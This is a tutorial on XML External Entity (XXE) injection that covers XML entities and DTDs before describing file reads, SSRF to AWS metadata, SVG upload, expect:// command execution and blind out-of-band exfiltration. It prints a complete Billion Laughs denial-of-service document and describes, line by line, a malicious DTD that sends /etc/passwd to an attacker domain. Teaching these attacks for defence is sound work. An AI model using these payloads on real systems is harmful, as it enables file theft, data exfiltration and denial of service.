Demystifying XML External Entity (XXE) Injection: A Comprehensive Guide

In this article, we explain the basics of XML, what XML External Entity (XXE) injection is, why it arises and how it can be exploited, and then summarize how to prevent XXE vulnerabilities. If you already know XML, you may jump directly to the XXE section.


Tuhin Bose

June 13th 2023.

All About XML

i. Basics of XML

XML (eXtensible Markup Language) is a widely used markup language designed to store and transport data in a structured, human-readable format.

Unlike HTML, XML does not use predefined tags (such as img or h1). Instead, tags can be given any relevant name that describes the data they contain. For example, we can use <book> to store a book's name, author and number of pages.

XML follows a hierarchical structure, where data is organized into a tree-like format. The fundamental building block of an XML document is an element. An element consists of an opening tag, content, and a closing tag. In the example below, <book> is the root element and it contains 3 child elements: <title>, <author> and <length>.

Simple XML Document
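As a minimal sketch of such a document, the Python snippet below parses a <book> element with the standard library and lists its children. The title, author and page count are placeholder values chosen for illustration.

```python
import xml.etree.ElementTree as ET

# Placeholder data: the values below are illustrative only.
BOOK_XML = """<?xml version="1.0"?>
<book>
  <title>Example Title</title>
  <author>Example Author</author>
  <length>250</length>
</book>"""

root = ET.fromstring(BOOK_XML)
child_tags = [child.tag for child in root]

print(root.tag)    # name of the root element
print(child_tags)  # names of its child elements, in document order
```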

ii. XML Entities

XML entities are an essential part of the XML standard. They let you represent special characters, predefined entities, or custom entities within an XML document. For example, the entities &lt; and &gt; represent the characters < and > respectively. These are metacharacters used to denote XML tags, so when they appear within data they must be written as entities; otherwise they conflict with the XML syntax.

XML provides five predefined entities that represent commonly used characters:

XML Entities

These predefined entities are necessary because their respective characters have special meanings in XML syntax. By using these entities, we can include these characters in XML content without causing any errors.
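The five predefined entities can be checked with a few lines of Python. This is only a sketch using the standard library; the sample strings are made up for illustration.

```python
import xml.etree.ElementTree as ET
from xml.sax.saxutils import escape

# The five predefined entities and the characters they stand for.
PREDEFINED = {"&lt;": "<", "&gt;": ">", "&amp;": "&", "&apos;": "'", "&quot;": '"'}

# A parser turns entity references back into the literal characters.
parsed = ET.fromstring("<note>&lt;b&gt; &amp; &apos;x&apos; &quot;y&quot;</note>").text

# escape() handles &, < and > by default; the quote characters are passed
# as extra mappings so that all five predefined entities are covered.
original = "5 < 6 & \"six\" > 'five'"
escaped = escape(original, {'"': "&quot;", "'": "&apos;"})

print(parsed)
print(escaped)
```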

iii. Document Type Definition (DTD)

XML documents can contain a document type definition (DTD), which defines the structure of an XML document and the data it contains. It specifies what elements can be used, in what order, and what attributes they can have.

Let's say we have an XML document for a library. The DTD for this document would define its structure, such as the elements book, author, title and publication date. It would also specify rules about the order in which elements should appear.

Sample DTD

DTDs can be loaded from external sources or declared in the document itself (as in the previous example), within a DOCTYPE declaration at the start of the XML document.
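For illustration, here is a sketch of a library document that carries its DTD inline. The element names follow the library example in the text; the element name publication_date and the book data are assumptions. Note that Python's ElementTree reads the DOCTYPE but does not validate against it.

```python
import xml.etree.ElementTree as ET

# Illustrative document: the book data and the exact element names are assumed.
LIBRARY_XML = """<?xml version="1.0"?>
<!DOCTYPE library [
  <!ELEMENT library (book+)>
  <!ELEMENT book (title, author, publication_date)>
  <!ELEMENT title (#PCDATA)>
  <!ELEMENT author (#PCDATA)>
  <!ELEMENT publication_date (#PCDATA)>
]>
<library>
  <book>
    <title>Example Title</title>
    <author>Example Author</author>
    <publication_date>2023-06-13</publication_date>
  </book>
</library>"""

# ElementTree is non-validating: it parses the internal DTD subset but does
# not enforce it. A validating parser would also check the declared order.
root = ET.fromstring(LIBRARY_XML)
book_fields = [child.tag for child in root.find("book")]
print(book_fields)
```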

iv. XML custom entities

XML custom entities are used within the DTD to represent and reference reusable pieces of data or text. There are two types of custom entities in XML: Internal Entities and External Entities.

Internal Entities: An internal entity is defined within the DTD or the document itself. It is declared using the <!ENTITY> declaration. The replacement value of an internal entity can be any valid text, including XML markup.

<?xml version="1.0"?>
<!DOCTYPE allemployees [
  <!ELEMENT allemployees (employee+)>
  <!ELEMENT employee (name, department)>
  <!ELEMENT name (#PCDATA)>
  <!ELEMENT department (#PCDATA)>
  <!ENTITY dept "Security">
]>
<allemployees>
  <employee>
      <name>Tuhin Bose</name>
      <department>&dept;</department>
  </employee>
  <employee>
      <name>Devang Solanki</name>
      <department>&dept;</department>
  </employee>
  <employee>
      <name>Sivadath KS</name>
      <department>&dept;</department>
  </employee>
</allemployees>

In the above example, the entity “dept” is defined with the replacement value “Security” (line 7). Whenever the “dept” entity reference is used within the XML document (lines 12, 16 and 20), it is replaced with the value “Security”.

External Entities: An external entity's value is stored outside the DTD, in a separate resource that the XML document references. The declaration of an external entity uses the SYSTEM keyword and must specify a URL from which the value of the entity should be loaded. The replacement value of an external entity is the content of the referenced resource.
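The substitution can be observed with a short Python sketch. It uses a trimmed copy of the employee document (two employees, element declarations omitted) and the standard library parser, which expands internal entities.

```python
import xml.etree.ElementTree as ET

# Trimmed copy of the document above: only the entity declaration is kept.
DOC = """<?xml version="1.0"?>
<!DOCTYPE allemployees [
  <!ENTITY dept "Security">
]>
<allemployees>
  <employee><name>Tuhin Bose</name><department>&dept;</department></employee>
  <employee><name>Devang Solanki</name><department>&dept;</department></employee>
</allemployees>"""

root = ET.fromstring(DOC)

# Every &dept; reference has been replaced by the entity's value.
departments = [emp.findtext("department") for emp in root.findall("employee")]
print(departments)
```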

Accessing Remote files

Whenever the "website" entity reference is used, it is replaced with the content of "https://bugbase.in/hey.txt". The file:// protocol can also be used to load external entities from local files. For example,

Accessing Local files
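The two declarations can be sketched as follows. The helper name, the <data> root element and the entity name myfile are assumptions made for this example; the "website" entity and its URL come from the text. The last function shows that Python's xml.etree.ElementTree refuses such documents, since it does not expand external entities and raises a ParseError instead.

```python
import xml.etree.ElementTree as ET


def external_entity_doc(name: str, system_id: str) -> str:
    """Return a document whose DTD declares one external entity and uses it."""
    return (
        '<?xml version="1.0"?>\n'
        f'<!DOCTYPE data [ <!ENTITY {name} SYSTEM "{system_id}"> ]>\n'
        f"<data>&{name};</data>"
    )


# Remote resource (entity name and URL taken from the text).
remote_doc = external_entity_doc("website", "https://bugbase.in/hey.txt")
# Local file via the file:// scheme (entity name is an assumption).
local_doc = external_entity_doc("myfile", "file:///etc/passwd")


def parses_with_stdlib(doc: str) -> bool:
    """True if ElementTree accepts the document, False on ParseError."""
    try:
        ET.fromstring(doc)
    except ET.ParseError:
        return False
    return True


print(remote_doc)
print(parses_with_stdlib(local_doc))
```

A parser that does resolve external entities would instead fetch the URL or read the file and substitute its content for the reference.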

XML External Entity Injection (XXE)

What is XXE?

XML External Entity Injection is a well-known vulnerability that arises when an application processes user-supplied XML data on the server using a poorly configured XML parser. An attacker can exploit an XXE vulnerability to read arbitrary files from the server, achieve SSRF, perform a denial-of-service attack and, in some cases, even execute arbitrary commands on the system.

Why does XXE arise?

Instead of JSON or form-data, some applications use XML to transmit data between the application and the server. They generally use a standard library or platform API to process the XML data on the server. XXE arises due to the improper handling of external entities by these XML parsers.

Exploitation

There are various types of XXE attacks. In this article, we'll try to explain the major ones:

i. Access Files from the Server: We can define an external entity that holds the contents of a file and reference that entity so that its value appears in the response. Let's assume there is a hospital management portal that looks up an admitted patient's details by sending the following HTTP request to the server:

POST /checkDetails HTTP/1.1  
Host: hospitalportal.com  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36  
Accept-Encoding: gzip, deflate  
Accept-Language: en-US  
Pragma: no-cache  
Content-Type: application/xml  
Content-Length: 110  
Upgrade-Insecure-Requests: 1  
  
<?xml version="1.0" encoding="UTF-8"?>  
<hospital>  
<wardId>3</wardId>  
<patientId>19</patientId>  
</hospital>

If the patientId doesn't match any record in the database, the application responds with something like "The patientId 19 doesn't exist in our database."; otherwise it returns the details of the patient. Note that the patientId (in this case, 19) is reflected in the response when it doesn't exist in the database. So we can define an external entity that holds the contents of /etc/passwd and reference that entity inside patientId. Since that patientId won't exist in the database, the application returns something like "The patientId <content of /etc/passwd> doesn't exist in our database." The payload will be:

Access Sensitive Files from the Server
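A sketch of the request body described above, built in Python. The entity name myfile and the DOCTYPE name are assumptions; the element names come from the request shown earlier.

```python
def file_read_payload(path: str, ward_id: int = 3) -> str:
    """Build the XML body that places an external entity inside <patientId>."""
    return (
        '<?xml version="1.0" encoding="UTF-8"?>\n'
        # The entity name "myfile" is an arbitrary choice for this sketch.
        f'<!DOCTYPE hospital [ <!ENTITY myfile SYSTEM "file://{path}"> ]>\n'
        "<hospital>\n"
        f"<wardId>{ward_id}</wardId>\n"
        # The reflected field carries the entity reference instead of an ID.
        "<patientId>&myfile;</patientId>\n"
        "</hospital>"
    )


payload = file_read_payload("/etc/passwd")
print(payload)
```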

ii. Server Side Request Forgery (SSRF) through XXE: In addition to retrieving system files, XXE can be used to launch an SSRF attack. For example, to make the server issue an HTTP request, we can specify the following XML body:

Invoking HTTP Request

If the application is hosted on an AWS EC2 instance, we can try accessing the AWS metadata endpoint.

Accessing AWS Metadata Endpoint
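Both SSRF bodies can be sketched with one helper. The entity name req and the internal address 192.168.0.10 are hypothetical; 169.254.169.254 is the link-local address of the EC2 instance metadata service.

```python
def ssrf_payload(url: str) -> str:
    """Build an XML body whose external entity points at an HTTP(S) URL."""
    return (
        '<?xml version="1.0" encoding="UTF-8"?>\n'
        # "req" is an arbitrary entity name chosen for this sketch.
        f'<!DOCTYPE hospital [ <!ENTITY req SYSTEM "{url}"> ]>\n'
        "<hospital>\n"
        "<wardId>3</wardId>\n"
        "<patientId>&req;</patientId>\n"
        "</hospital>"
    )


# Request to a host only reachable from the server (hypothetical address).
internal_request = ssrf_payload("http://192.168.0.10:8080/")

# EC2 instance metadata service, addressed by its link-local IP.
aws_metadata = ssrf_payload("http://169.254.169.254/latest/meta-data/")

print(aws_metadata)
```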

iii. XXE via image file upload: Some applications allow users to upload images, which are then processed or validated on the server side using image processing libraries. Apart from the usual image formats (such as JPEG or PNG), these libraries might also support SVG images. Since the SVG format uses XML, an attacker can try to upload a malicious SVG image to trigger an XXE vulnerability. Let’s look at the following SVG payload:

Malicious SVG Image

The first four lines were already explained in the previous sections. In the next line, we define the width and height of the SVG image (in pixels). Next, we set the font size used to render the contents of the /etc/passwd file (i.e. the value of &myfile;) using the font-size attribute of the <text> tag. The other attributes, x and y, define the coordinates at which the text is rendered.
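An SVG file matching that description might look like the sketch below. The dimensions, font size, coordinates and DOCTYPE name are assumed values; only the myfile entity and the /etc/passwd target come from the text.

```python
# Sketch of an SVG upload: lines 1-4 declare the entity, line 5 sets the
# canvas size, line 6 renders the entity's value as text.
SVG_PAYLOAD = """<?xml version="1.0" standalone="yes"?>
<!DOCTYPE svg [
  <!ENTITY myfile SYSTEM "file:///etc/passwd">
]>
<svg width="500px" height="500px" xmlns="http://www.w3.org/2000/svg" version="1.1">
  <text font-size="16" x="0" y="16">&myfile;</text>
</svg>"""

svg_lines = SVG_PAYLOAD.splitlines()
print(SVG_PAYLOAD)
```

If the image library resolves the entity, the file content ends up rendered inside the processed image.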

iv. DoS (Billion Laughs Attack): We can perform a denial-of-service attack via XXE. This attack is also known as the Billion Laughs attack. It occurs when the XML parser expands entities that are nested inside one another, which overloads the server and results in denial of service. Let’s look at the following XML document:

<?xml version="1.0"?>  
<!DOCTYPE lolz [  
<!ENTITY lol "lol">  
<!ELEMENT lolz (#PCDATA)>  
<!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">  
<!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">  
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">  
<!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">  
<!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">  
<!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">  
<!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">  
<!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">  
<!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">  
]>  
<lolz>&lol9;</lolz>

First, we define an internal entity lol as "lol" (line 3). In line 5, we define an entity lol1 that references the entity lol 10 times, so it expands to "lollollollollollollollollollol". Then we define an entity lol2 that references lol1 10 times, so it expands to "lol" repeated 100 times. Continuing this way, the entity lol9 expands to "lol" repeated 10⁹ times. Finally, in the last line, lol9 is referenced, so the parser tries to produce "lol" repeated 10⁹ times, which is roughly 3 GB of text. This amount of processing and the size of the resulting string cause a denial of service as the XML parser quickly exhausts the system's resources.
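The growth can be worked out without expanding anything. The sketch below only computes the size of each expansion; the function name is made up for this example.

```python
def expanded_length(level: int, fanout: int = 10, base: str = "lol") -> int:
    """Number of characters produced by fully expanding entity lol<level>."""
    # Each level repeats the previous one `fanout` times.
    return len(base) * fanout ** level


for level in (1, 2, 9):
    print(f"lol{level}: {expanded_length(level):,} characters")
```

With a fan-out of 10 and nine levels, a document of well under a kilobyte asks the parser for 3,000,000,000 characters.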

v. Remote Code Execution (Rare): In some rare cases, the PHP expect module may be loaded, which allows us to execute arbitrary commands using the following payload:

Executing "id" Command
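A sketch of such a body, reusing the hospital request from earlier. The entity name cmd is an assumption, and the payload only has an effect when the target's PHP installation has the expect:// wrapper available.

```python
# The expect:// wrapper runs the command after the scheme ("id" here) and
# returns its output as the entity's replacement text.
EXPECT_PAYLOAD = (
    '<?xml version="1.0" encoding="UTF-8"?>\n'
    '<!DOCTYPE hospital [ <!ENTITY cmd SYSTEM "expect://id"> ]>\n'
    "<hospital>\n"
    "<wardId>3</wardId>\n"
    "<patientId>&cmd;</patientId>\n"
    "</hospital>"
)

print(EXPECT_PAYLOAD)
```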

vi. Modifying Content-Type: Some applications accept content types other than the one generated by their frontend HTML form. So we can try changing the Content-Type from the default one (URL-encoded or JSON) to XML. For example, the request body username=tuhin1729 or {"username":"tuhin1729"} can be changed to <?xml version="1.0" encoding="UTF-8"?><username>tuhin1729</username>.
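The conversion can be sketched as a small Python helper. The function name and the <request> wrapper used for multi-field bodies are assumptions; when resending, the Content-Type header would also be switched to application/xml.

```python
import json
from urllib.parse import parse_qsl
from xml.sax.saxutils import escape

XML_DECL = '<?xml version="1.0" encoding="UTF-8"?>'


def to_xml_body(fields: dict, root: str = "request") -> str:
    """Re-encode flat key/value fields as an XML request body."""
    elements = "".join(
        f"<{key}>{escape(str(value))}</{key}>" for key, value in fields.items()
    )
    # XML allows a single root element, so several fields need a wrapper.
    # The wrapper name is a guess; the server may expect something else.
    if len(fields) != 1:
        elements = f"<{root}>{elements}</{root}>"
    return XML_DECL + elements


from_form = to_xml_body(dict(parse_qsl("username=tuhin1729")))
from_json = to_xml_body(json.loads('{"username":"tuhin1729"}'))
print(from_form)
```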

vii. Blind XXE: Now let's discuss blind XML External Entity injection. In the earlier hospital management portal example, we assumed that the application returns the value of an element in its response (if the patientId doesn't match the database, it shows something like "The patientId 19 doesn’t exist in our database."). Blind XXE occurs when the application is vulnerable to XXE but does not return the value of any element in its responses, so we cannot see the output directly. To detect blind XXE, we can trigger an out-of-band network interaction with a server we control (for example, Burp Collaborator) using the SSRF through XXE technique.

Before looking at the exploitation of blind XXE, we need to understand some basic concepts about XML parameter entities. In some cases, regular XML external entities are blocked by the application's input validation. In these cases, we may use XML parameter entities instead. XML parameter entities are a special kind of XML entity that can only be referenced within the DTD. To declare an XML parameter entity, we use the following syntax:

<!ENTITY % bugbase "Indian Bug Bounty platform" >

Parameter entities are referenced using the percent character (%bugbase;) instead of the usual ampersand used for general entities. If regular XML external entities are blocked, we can detect blind XXE with the following payload:

Triggering out-of-band network interaction

This payload defines an XML parameter entity myweb and then references it within the DTD using %myweb;. If the application is vulnerable, this causes a DNS lookup and an HTTP request to bugbase.in (i.e. the attacker's domain).
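A sketch of such a probe, built in Python. The DOCTYPE name foo and the element content are placeholders; the myweb entity and the bugbase.in host come from the text.

```python
def oob_probe(callback_url: str) -> str:
    """Build a document that declares and immediately references a
    parameter entity pointing at a server the tester controls."""
    return (
        '<?xml version="1.0" encoding="UTF-8"?>\n'
        # %myweb; is referenced inside the DTD, where parameter entities live.
        f'<!DOCTYPE foo [ <!ENTITY % myweb SYSTEM "{callback_url}"> %myweb; ]>\n'
        "<foo>test</foo>"
    )


probe = oob_probe("http://bugbase.in")
print(probe)
```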

Generally, there are two ways to exploit blind XXE:

(I) Exfiltrate data using out-of-band network interactions: Once we've detected a blind XXE vulnerability, the next step is to exfiltrate sensitive data. For this, we need to host a malicious DTD on our server and invoke that external DTD from within the XML payload. To exfiltrate the contents of the /etc/passwd file, save the following DTD on your server as bugbase.dtd:

bugbase.dtd

Here is the explanation of the above payload:
Line 1: We define an XML parameter entity myfile, which holds the content of the file /etc/passwd.
Line 2: We define an XML parameter entity eval, which contains a dynamic declaration of another XML parameter entity, exfil. When the exfil entity is referenced, it sends an HTTP request to the attacker-controlled domain attacker.bugbase.in and passes the content of /etc/passwd (via the myfile entity) in the GET parameter data.
Line 3: We reference the eval entity so that the declaration of the exfil entity is performed.
Line 4: Finally, we reference the exfil entity to trigger the HTTP request.
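The four lines described above can be reconstructed as follows. This is a sketch based on that description; the helper name is made up, and &#x25; is the character reference for %, which is needed because a literal % is not allowed inside the entity value.

```python
def exfil_dtd(path: str, collector: str) -> str:
    """Return a four-line DTD matching the line-by-line description."""
    lines = [
        # Line 1: read the target file into %myfile;
        f'<!ENTITY % myfile SYSTEM "file://{path}">',
        # Line 2: %eval; declares %exfil; with the file content in the URL.
        f"<!ENTITY % eval \"<!ENTITY &#x25; exfil SYSTEM 'http://{collector}/?data=%myfile;'>\">",
        # Line 3: perform the nested declaration.
        "%eval;",
        # Line 4: trigger the HTTP request.
        "%exfil;",
    ]
    return "\n".join(lines)


bugbase_dtd = exfil_dtd("/etc/passwd", "attacker.bugbase.in")
print(bugbase_dtd)
```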

Now we need to invoke this external DTD within our xml payload.

Invoking the bugbase.dtd

The above payload defines an XML parameter entity tuhin and calls the entity within the DTD. This will cause the XML parser to fetch the external DTD from attacker’s server and process it. Then the malicious DTD will be executed, and the content of /etc/passwd will be sent to the attacker's server.
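A sketch of that invoking payload. The tuhin entity comes from the text; the DTD URL assumes the file is hosted on attacker.bugbase.in, and the DOCTYPE name is a placeholder.

```python
def invoke_external_dtd(dtd_url: str) -> str:
    """Build a document that pulls in and processes a remotely hosted DTD."""
    return (
        '<?xml version="1.0" encoding="UTF-8"?>\n'
        f'<!DOCTYPE foo [ <!ENTITY % tuhin SYSTEM "{dtd_url}"> %tuhin; ]>\n'
        "<foo>test</foo>"
    )


# Hosting location is an assumption made for this example.
invoke_payload = invoke_external_dtd("http://attacker.bugbase.in/bugbase.dtd")
print(invoke_payload)
```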

(II) Trigger XML parsing errors to reveal sensitive data: This technique will only work if the application returns the error message in the response. Here the main idea is to trigger an XML parsing error where the error message contains the sensitive data. We can do so by trying to include a non-existent file using XML parameter entity. Let’s take a look at the following payload:

Including non-existent file to cause errors

In the first line, we've defined an XML parameter entity myfile which contains the content of the file /etc/passwd. Next, we've defined another XML parameter entity eval which contains declaration of the XML parameter entity myerror. The myerror entity will try to get a non-existent file whose name contains the value of the myfile entity (i.e. the content of /etc/passwd). Then, we've called the eval entity so that the declaration of the myerror entity is performed. Finally, we've called the myerror entity to invoke the error since the file doesn't exist.
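The DTD described in this paragraph can be sketched as below. The /nonexistent/ prefix matches the Java error message quoted in this section; the helper name is made up for this example.

```python
def error_dtd(path: str) -> str:
    """Return a DTD that forces a file-not-found error containing file data."""
    lines = [
        f'<!ENTITY % myfile SYSTEM "file://{path}">',
        # The bogus path embeds the content of %myfile; so that the parser's
        # error message repeats it.
        "<!ENTITY % eval \"<!ENTITY &#x25; myerror SYSTEM 'file:///nonexistent/%myfile;'>\">",
        "%eval;",
        "%myerror;",
    ]
    return "\n".join(lines)


error_based_dtd = error_dtd("/etc/passwd")
print(error_based_dtd)
```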

Now we need to invoke this external DTD within our xml payload.

Invoking the bugbase.dtd

If the application is written in Java, it will return an error like:

java.io.FileNotFoundException: /nonexistent/root:x:0:0:root:/root:/bin/bash  
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin  
bin:x:2:2:bin:/bin:/usr/sbin/nologin  
...

Prevention

Generally, XXE vulnerabilities arise from improper handling of external entities by XML parsers. The easiest and most effective way to prevent XXE attacks is to disable external entities and support for XInclude in the parser. Additionally, a web application firewall (WAF) can be deployed to block XXE inputs. For more detailed prevention strategies, take a look at the OWASP XXE Prevention Cheat Sheet.
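As one possible hardening sketch in Python, untrusted input can be rejected as soon as it carries a DOCTYPE, so that no entity can be declared at all. The names safe_parse and DTDForbidden are made up for this example. It is stricter than only disabling external entities, and it assumes the application never needs DTDs in client input.

```python
import xml.etree.ElementTree as ET
from xml.parsers import expat


class DTDForbidden(ValueError):
    """Raised when untrusted XML carries a DOCTYPE declaration."""


def _reject_doctype(name, system_id, public_id, has_internal_subset):
    # Called by expat as soon as it sees <!DOCTYPE ...>.
    raise DTDForbidden(f"DOCTYPE '{name}' is not allowed in untrusted input")


def safe_parse(xml_text: str) -> ET.Element:
    """Parse XML only if it declares no DTD (and therefore no entities)."""
    checker = expat.ParserCreate()
    checker.StartDoctypeDeclHandler = _reject_doctype
    checker.Parse(xml_text, True)  # propagates DTDForbidden on any DOCTYPE
    return ET.fromstring(xml_text)


patient = safe_parse("<hospital><wardId>3</wardId><patientId>19</patientId></hospital>")
print(patient.findtext("patientId"))

try:
    safe_parse('<!DOCTYPE h [<!ENTITY x SYSTEM "file:///etc/passwd">]><h>&x;</h>')
    blocked = False
except DTDForbidden:
    blocked = True
print(blocked)
```

The document is parsed twice here for simplicity. In production code, a maintained library such as defusedxml, or the parser-specific settings from the OWASP cheat sheet, is usually the better choice.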